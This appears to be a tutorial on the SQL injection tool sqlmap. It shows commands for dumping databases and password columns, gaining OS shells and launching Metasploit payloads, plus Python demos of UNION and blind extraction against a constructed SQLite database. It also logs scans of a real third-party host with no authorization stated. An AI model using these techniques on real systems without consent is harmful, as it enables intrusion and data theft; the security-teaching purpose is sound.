Hi everyone, today I'm sharing a formidable Python-based tool: sqlmap.
GitHub: https://github.com/sqlmapproject/sqlmap
In application security, SQL injection remains one of the most common attack classes. sqlmap is an open-source tool that automates the detection and exploitation of SQL injection flaws and the takeover of the database behind them. This article covers installing sqlmap, its features, its basic and advanced functions, and practical scenarios for its use in security testing.
Installation
sqlmap is written in Python (2.6, 2.7 and 3.x are supported) and can be installed with pip or by cloning its GitHub repository:
pip install sqlmap
or:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
The pip package installs a sqlmap command; the git checkout is the development version and is run as python sqlmap.py from the cloned directory. Both forms appear in the commands below and are interchangeable.
Features
- Broad DBMS support: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite and many others.
- Automatic detection of injection points: sqlmap sends its own payloads for each parameter and compares the responses.
- All major injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Rich enumeration: database names, tables, columns and the data they contain.
Basic features
Automatic detection of injection points
Finding injectable parameters is sqlmap's most basic function. You provide a suspicious URL and sqlmap analyses every parameter in it.
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch
This command tests the target URL for SQL injection. Note that the URL above carries no GET parameter, so there is no id parameter to test; sqlmap warns about this and, because no --data was given either, offers to inject into the URI path itself (shown in the log as URI parameter '#1*'). --batch answers every prompt with its default so the run needs no interaction. In the run below nothing turns out to be injectable; the closing summary counts 88 responses with HTTP status 444, a non-standard code nginx uses when it closes a connection without sending a response, which indicates the server was dropping most test requests rather than processing them, so this negative result says little about the application itself.
Output:
[sqlmap banner, version 1.8.5.4#dev, https://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:29:48 /2024-05-13/
[10:29:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:29:48] [INFO] testing connection to the target URL
[10:29:49] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:29:49] [INFO] testing if the target URL content is stable
[10:29:49] [INFO] target URL content is stable
[10:29:49] [INFO] testing if URI parameter '#1*' is dynamic
[10:29:49] [INFO] heuristics detected web page charset 'utf-8'
[10:29:49] [WARNING] URI parameter '#1*' does not appear to be dynamic
[10:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[10:29:50] [INFO] testing for SQL injection on URI parameter '#1*'
[10:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:29:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:29:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:29:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:29:56] [INFO] testing 'Generic inline queries'
[10:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:29:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:29:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:29:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:30:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:30:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:30:02] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:30:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:30:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:30:05] [INFO] target URL appears to have 1 column in query
[10:30:05] [WARNING] applying generic concatenation (CONCAT)
[10:30:05] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[10:30:07] [WARNING] URI parameter '#1*' does not seem to be injectable
[10:30:07] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:30:07] [WARNING] HTTP error codes detected during run:
444 (?) - 88 times, 404 (Not Found) - 5 times
[*] ending @ 10:30:07 /2024-05-13/
Retrieving database information
Once an injection point has been confirmed, sqlmap can fingerprint the backend: DBMS type, version and structure.
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch --banner
--banner asks sqlmap to retrieve the DBMS version banner (for example the MySQL, Oracle or PostgreSQL version string). Enumeration options such as --banner only produce output once a working injection point exists; in the run below the same target is again found not injectable, so detection stops with the same CRITICAL message and no banner is printed.
Output:
[sqlmap banner, version 1.8.5.4#dev, https://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:31:28 /2024-05-13/
[10:31:28] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:31:28] [INFO] testing connection to the target URL
[10:31:28] [INFO] testing if the target URL content is stable
[10:31:29] [INFO] target URL content is stable
[10:31:29] [INFO] testing if URI parameter '#1*' is dynamic
[10:31:29] [INFO] heuristics detected web page charset 'utf-8'
[10:31:29] [WARNING] URI parameter '#1*' does not appear to be dynamic
[10:31:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[10:31:29] [INFO] testing for SQL injection on URI parameter '#1*'
[10:31:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:31:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:31:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:31:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:31:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:31:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:31:36] [INFO] testing 'Generic inline queries'
[10:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:31:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:31:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:31:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:31:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:31:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:31:41] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:31:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:31:43] [WARNING] URI parameter '#1*' does not seem to be injectable
[10:31:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:31:43] [WARNING] HTTP error codes detected during run:
444 (?) - 71 times, 404 (Not Found) - 3 times
[*] ending @ 10:31:43 /2024-05-13/
Extracting database data
sqlmap can enumerate and extract what is stored in the database: table names, column names and the rows themselves. The options build on each other, narrowing from database to table to columns.
sqlmap -u "http://example.com/page.php?id=1" --batch --dbs
Lists all databases visible to the DBMS user the injected query runs as.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname --tables
Lists all tables in database dbname.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename --columns
Lists all columns of table tablename.
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename -C column1,column2 --dump
Extracts and prints the values of column1 and column2 from that table. Without -C, --dump retrieves every column; without -D, sqlmap uses the current database of the injected query.
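To make concrete what the --tables, --columns and --dump steps above do on the wire, here is an added example (not code from the page or from the sqlmap project) that reproduces the UNION-based version of that enumeration against a constructed SQLite database. The schema, the products lookup endpoint and the users table are assumptions standing in for a real target; SQLite's sqlite_master catalog plays the role information_schema plays on MySQL or PostgreSQL. The column-count probing mirrors the "'ORDER BY' technique" line in the log above, the dump helper also applies the row filter that --where adds, and the hardened lookup shows why a parameterized query defeats the same payloads.

```python
import sqlite3

# Constructed stand-in for the target's backend database (an assumption: the page
# never shows the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT, role TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        INSERT INTO users VALUES (1, 'alice', 'pw-alice', 'admin'), (2, 'bob', 'pw-bob', 'user');
    """)
    return conn

def lookup_vulnerable(conn, item_id):
    # The flaw sqlmap hunts for: the request parameter is pasted into the SQL text.
    sql = f"SELECT name, price FROM products WHERE id = {item_id}"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, item_id):
    # Hardened form: the value is bound as a parameter and can never become SQL syntax.
    return conn.execute("SELECT name, price FROM products WHERE id = ?", (item_id,)).fetchall()

def find_column_count(conn, max_cols=10):
    # ORDER BY probing: ORDER BY n succeeds while n <= number of selected columns
    # and raises an error once n exceeds it, which reveals the count.
    for n in range(1, max_cols + 1):
        try:
            lookup_vulnerable(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None

def _union_payload(conn, select_expr, table, where=None):
    # Build "-1 UNION SELECT <expr>, NULL, ... FROM table": id = -1 empties the original
    # result set and NULL padding matches the column count, so only injected rows return.
    ncols = find_column_count(conn)
    padding = "".join(", NULL" for _ in range(ncols - 1))
    payload = f"-1 UNION SELECT {select_expr}{padding} FROM {table}"
    if where:
        payload += f" WHERE {where}"
    return payload

def union_tables(conn):
    # Equivalent of --tables: read table names out of the catalog.
    payload = _union_payload(conn, "name", "sqlite_master", "type='table'")
    return sorted(row[0] for row in lookup_vulnerable(conn, payload))

def union_dump(conn, table, columns, where=None):
    # Equivalent of -T table -C col1,col2 --dump [--where=...]: the wanted columns are
    # concatenated into the single text column the UNION exposes.
    concat = " || ':' || ".join(columns)
    payload = _union_payload(conn, concat, table, where)
    return sorted(row[0] for row in lookup_vulnerable(conn, payload))

if __name__ == "__main__":
    db = make_db()
    print("columns in query:", find_column_count(db))
    print("tables:", union_tables(db))
    print("users dump:", union_dump(db, "users", ["name", "password"]))
    print("admins only:", union_dump(db, "users", ["name", "password"], where="role='admin'"))
    print("hardened lookup, same payload:", lookup_safe(db, "1 OR 1=1"))
```

The padding step is the reason sqlmap spends requests on "Generic UNION query (NULL) - 1 to 10 columns": a UNION only parses when both sides select the same number of columns, so the count has to be learned before any data can be pulled.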
Advanced features
Operating-system-level access
sqlmap can turn a SQL injection into access to the underlying operating system, up to an interactive shell on the database server.
sqlmap -u "http://example.com/page.php?id=1" --os-shell
This command tries to obtain an OS shell through the injection. It does not exploit a bug in the DBMS; it uses the DBMS's own facilities, so it only works when the injected query runs with enough privilege: xp_cmdshell on Microsoft SQL Server, and on MySQL or PostgreSQL writing a web stager or a user-defined function to disk (sqlmap prompts for the web application language and a writable web root). Stacked queries or a file-write primitive (for example the FILE privilege on MySQL) are therefore prerequisites.
Out-of-band OS access (Metasploit)
sqlmap can also hand a compromised host over to the Metasploit Framework, which must be installed on the tester's machine.
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
--os-pwn uploads and runs a Metasploit payload on the database server and prompts for an out-of-band shell, a Meterpreter session or VNC. It is not a persistent database backdoor: it is an OS-level payload executed on the server, and it needs the same privileges as --os-shell.
Time-based blind injection
Time-based blind injection infers data from differences in response time rather than response content, one yes/no answer per request, and sqlmap automates the whole inference.
sqlmap -u "http://example.com/page.php?id=1" --technique=T
This restricts testing to time-based blind payloads. --technique selects which technique letters to use (B: boolean-based blind, E: error-based, U: UNION query-based, S: stacked queries, T: time-based blind, Q: inline queries); the default is all of them, and several can be combined, for example --technique=BT. Because a time-based test relies on measuring delays, sqlmap first measures the normal response time, and on a jittery network link this technique is both slower and less reliable than content-based ones.
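The inference loop behind the B and T techniques is the same; only the oracle differs. The following is an added example (not code from the page or from sqlmap) that runs that loop offline against a constructed SQLite database: the products lookup endpoint, the users table and the secrets it holds are assumptions, and since SQLite has no SLEEP() function one is registered in Python so the payload shape matches MySQL's "AND SLEEP(n)" form the log above tests for.

```python
import sqlite3
import time

# Constructed stand-in for the target backend (an assumption; the page shows no schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT, role TEXT);
        INSERT INTO products VALUES (1, 'widget');
        INSERT INTO users VALUES (1, 'alice', 'pw-alice', 'admin');
    """)
    # Emulates MySQL's SLEEP(seconds); SQLite itself has no such function.
    conn.create_function("SLEEP", 1, time.sleep)
    return conn

def page_shows_product(conn, item_id):
    # Simulated vulnerable endpoint: the parameter is concatenated into the query and the
    # only observable is whether the product row is rendered (True) or not (False).
    rows = conn.execute(f"SELECT name FROM products WHERE id = {item_id}").fetchall()
    return len(rows) > 0

def boolean_oracle(conn, condition):
    # Boolean-based blind (--technique=B): "1 AND (cond)" keeps the row only when cond
    # holds, so the page content answers one yes/no question per request.
    return page_shows_product(conn, f"1 AND ({condition})")

def time_oracle(conn, condition, delay=0.05):
    # Time-based blind (--technique=T): the content is identical either way (the row is
    # never shown), so the answer is read from how long the request took.
    started = time.monotonic()
    page_shows_product(conn, f"1 AND CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END")
    return time.monotonic() - started >= delay / 2

def extract(oracle, expr, max_len=64):
    # Shared inference loop: ask whether position i exists, then binary-search the
    # character code at that position (7 requests per character over 0..127).
    result = []
    for i in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {i}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result.append(chr(lo))
    return "".join(result)

def dump_via_boolean(conn, expr):
    return extract(lambda cond: boolean_oracle(conn, cond), expr)

def dump_via_time(conn, expr):
    return extract(lambda cond: time_oracle(conn, cond), expr)

if __name__ == "__main__":
    db = make_db()
    secret = "(SELECT password FROM users WHERE name = 'alice')"
    print("boolean-based:", dump_via_boolean(db, secret))
    print("time-based:   ", dump_via_time(db, "(SELECT role FROM users WHERE id = 1)"))
```

Counting the requests explains the cost difference sqlmap users see: every character needs about eight oracle queries, and with the time-based oracle roughly half of them must wait out the full delay, which is why sqlmap prefers UNION or error-based extraction whenever it finds one.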
Custom injection points and data extraction
sqlmap lets you pin the injection to a specific point and constrain exactly what is dumped.
sqlmap -u "http://example.com/page.php?id=1" --dbms=MySQL --dump -T users -C name,password --where="role='admin'"
This extracts the name and password columns from the users table, but only rows whose role column is admin: --where appends that condition to the dump query, --dbms=MySQL skips fingerprinting by telling sqlmap the backend, and since no -D is given the current database is used. The injection point itself can be pinned by placing an asterisk (*) in the URL or in the --data string at the exact position where sqlmap should inject.
Practical scenarios
Security audits
In a security audit, sqlmap is used to identify and document SQL injection flaws in web applications so that their owners understand and fix the risk.
sqlmap -u "http://example.com/page.php?id=1" --risk=3 --level=5 --batch
This configures a thorough test: --level=5 adds more payloads and tests more inputs (Cookie, User-Agent, Referer and Host headers, not only GET and POST parameters), and --risk=3 enables the riskier payloads. Use --risk=3 with care: it includes OR-based boolean payloads which, if the injected statement is an UPDATE or DELETE rather than a SELECT, can modify or delete rows in the target database. --batch auto-answers all prompts.
Penetration testing
In a penetration test, the tester uses sqlmap to confirm suspected flaws and to demonstrate the impact an attacker could achieve.
sqlmap -u "http://example.com/page.php?id=1" --dbs --technique=U
This enumerates all accessible databases using only UNION query-based injection, which when available is the fastest technique because each request returns a whole result set instead of a single yes/no answer.
Security education and training
sqlmap is also widely used for teaching, to show learners how SQL injection works and how to defend against it.
sqlmap -u "http://example.com/page.php?id=1" --banner
This simple command shows learners how the DBMS version banner is retrieved through an injection, a good first demonstration. Run such demonstrations only against deliberately vulnerable lab applications, never against production systems.
Automation scripts
sqlmap can be driven from other tooling, either by invoking its command line or through its REST API server (sqlmapapi.py). The simplest form runs the command line from Python:
import subprocess

# --batch answers prompts automatically; --beep rings the terminal bell on prompts and when an injection is found
result = subprocess.run(["sqlmap", "-u", "http://example.com/page.php?id=1", "--batch", "--beep"],
                        capture_output=True, text=True)
print(result.stdout)
This runs the test without user interaction and alerts with a beep when a vulnerability is found. Passing the arguments as a list keeps the target URL out of a shell, which matters when URLs contain characters such as & or quotes.
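A script that merely launches sqlmap still leaves a human to read the result. The following added example (not part of the page or of sqlmap) wraps the command line for a list of targets and turns the output into a verdict by matching the summary lines sqlmap prints. The "all tested parameters do not appear to be injectable" line and the HTTP error summary format are taken from the runs above; the "sqlmap identified the following injection point" header is sqlmap's standard positive summary. The error-count threshold that downgrades a negative verdict to "inconclusive" is a heuristic chosen here, not a sqlmap setting, and the sqlmap command name is assumed to be on PATH.

```python
import re
import subprocess

# Negative verdict line as printed in the runs above; positive line is sqlmap's
# header before its list of confirmed injection points.
RE_VULNERABLE = re.compile(r"sqlmap identified the following injection point")
RE_NOT_VULNERABLE = re.compile(r"all tested parameters do not appear to be injectable")
# Matches entries such as "444 (?) - 88 times, 404 (Not Found) - 5 times".
RE_HTTP_ERROR = re.compile(r"(\d{3}) \([^)]*\) - (\d+) times")

# Heuristic threshold (an assumption, not a sqlmap option): a negative verdict reached
# while this many requests got error responses is not trusted.
MAX_ERRORS_FOR_TRUSTED_NEGATIVE = 20

def http_error_counts(output):
    """Parse the 'HTTP error codes detected during run' summary into {status: count}."""
    return {code: int(count) for code, count in RE_HTTP_ERROR.findall(output)}

def classify(output):
    """Turn raw sqlmap output into (verdict, error_counts) where verdict is
    'vulnerable', 'not_vulnerable' or 'inconclusive'."""
    errors = http_error_counts(output)
    if RE_VULNERABLE.search(output):
        return "vulnerable", errors
    if RE_NOT_VULNERABLE.search(output):
        if sum(errors.values()) > MAX_ERRORS_FOR_TRUSTED_NEGATIVE:
            # As with the 444s above: the server dropped requests, so little was tested.
            return "inconclusive", errors
        return "not_vulnerable", errors
    return "inconclusive", errors

def scan(url, extra_args=(), sqlmap_cmd=("sqlmap",)):
    """Run sqlmap non-interactively against one URL and classify its output.
    Arguments go through as a list so the URL never meets a shell; the verdict is read
    from the text because sqlmap's exit status is not relied on here."""
    cmd = [*sqlmap_cmd, "-u", url, "--batch", *extra_args]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return classify(proc.stdout + proc.stderr)

def scan_many(urls, **kwargs):
    """Scan several targets and return {url: (verdict, error_counts)}."""
    return {url: scan(url, **kwargs) for url in urls}

if __name__ == "__main__":
    import sys
    for target, (verdict, errors) in scan_many(sys.argv[1:]).items():
        print(f"{verdict:15} {target}  errors={errors}")
```

Treating a "not injectable" verdict as inconclusive whenever the server answered most probes with error codes is the check a practitioner would want: in the runs above, 88 responses of status 444 mean the application was never really exercised, and a pipeline that reported "clean" on that basis would be wrong.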
Summary
sqlmap is a powerful automated SQL injection tool built to detect and exploit injection flaws and take over the database behind them. It supports a wide range of DBMSs, finds injection points automatically, and uses several techniques to enumerate databases, tables and data. Its functions range from retrieving the version banner and dumping data to reading the underlying file system and executing operating-system commands, including out-of-band access through Metasploit. The tool serves security professionals in audits and penetration tests and is widely used in training to explain and defend against SQL injection. Through its command line and its REST API, sqlmap integrates easily into automated testing and is an indispensable tool in web application security.